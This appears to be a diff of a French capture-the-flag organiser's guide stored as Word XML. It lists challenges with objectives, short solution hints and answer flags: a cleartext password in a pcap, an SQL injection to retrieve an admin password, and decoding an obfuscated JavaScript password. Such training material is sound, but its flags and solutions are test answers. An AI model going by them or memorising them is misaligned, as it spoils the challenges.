             <wp:effectExtent l="0" t="0" r="0" b="6985"/>
             <wp:docPr id="25" name="Image 25"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5760720" cy="1155084"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="528BB5D7" wp14:editId="54CBDF28">
-            <wp:extent cx="5760720" cy="3114317"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="26" name="Image 26"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5760720" cy="3114317"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Solution :</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Télécharger le fichier .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>pcap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> et l’ouvrir avec </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Wireshark</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. Le mot de passe apparait en clair dans les trames échangées </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Flag team A :</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> cdts3500</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Flag team B :</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> cdts3600</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1065"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="1062" w:firstLine="3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Nom de la faille</w:t>
-      </w:r>
-      <w:r>
-        <w:t> : Injection SQL – http-018</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Catégorie </w:t>
-      </w:r>
-      <w:r>
-        <w:t>: http</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Objectif </w:t>
-      </w:r>
-      <w:r>
-        <w:t>: récupérer le mot de passe administrateur enregistré dans la base</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Description :</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Le challenger doit retrouver le mot de passe administrateur du site enregistré dans une base SQL. Il dispose d’une page formulaire où il peut réaliser des injections SQL.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Titre2"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Capture d’écran : </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB31EC6" wp14:editId="24B065C7">
-            <wp:extent cx="5760720" cy="1443548"/>
-            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
-            <wp:docPr id="27" name="Image 27"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -10261,7 +10241,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5760720" cy="1443548"/>
+                      <a:ext cx="5760720" cy="1155084"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -10285,10 +10265,10 @@
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3255FC98" wp14:editId="27C82AA9">
-            <wp:extent cx="4648200" cy="1647825"/>
-            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="28" name="Image 28"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="528BB5D7" wp14:editId="54CBDF28">
+            <wp:extent cx="5760720" cy="3114317"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="26" name="Image 26"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -10308,6 +10288,279 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="3114317"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Solution :</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Télécharger le fichier .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pcap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> et l’ouvrir avec Wireshark. Le mot de passe apparait en clair dans les trames échangées </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Flag team A :</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> cdts3500</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Flag team B :</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> cdts3600</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="1062" w:firstLine="3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Nom de la faille</w:t>
+      </w:r>
+      <w:r>
+        <w:t> : Injection SQL – http-018</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Catégorie </w:t>
+      </w:r>
+      <w:r>
+        <w:t>: http</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Objectif </w:t>
+      </w:r>
+      <w:r>
+        <w:t>: récupérer le mot de passe administrateur enregistré dans la base</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Description :</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Le challenger doit retrouver le mot de passe administrateur du site enregistré dans une base SQL. Il dispose d’une page formulaire où il peut réaliser des injections SQL.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Capture d’écran : </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB31EC6" wp14:editId="24B065C7">
+            <wp:extent cx="5760720" cy="1443548"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="27" name="Image 27"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1443548"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3255FC98" wp14:editId="27C82AA9">
+            <wp:extent cx="4648200" cy="1647825"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="28" name="Image 28"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="4648200" cy="1647825"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -10679,1024 +10932,6 @@
             <wp:extent cx="5760720" cy="739140"/>
             <wp:effectExtent l="0" t="0" r="0" b="3810"/>
             <wp:docPr id="16" name="Image 16"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId24"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5760720" cy="739140"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Solution </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Utiliser</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> la fonction </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>unescape</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sur la variable </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>pass</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> et utiliser la fonction String </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>fro</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t> ; char code encapsulée à l’intérieur.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Flag de la faille A : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>hDufjdki156</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Flag de la faille B : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>ADufjdki156</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1065"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
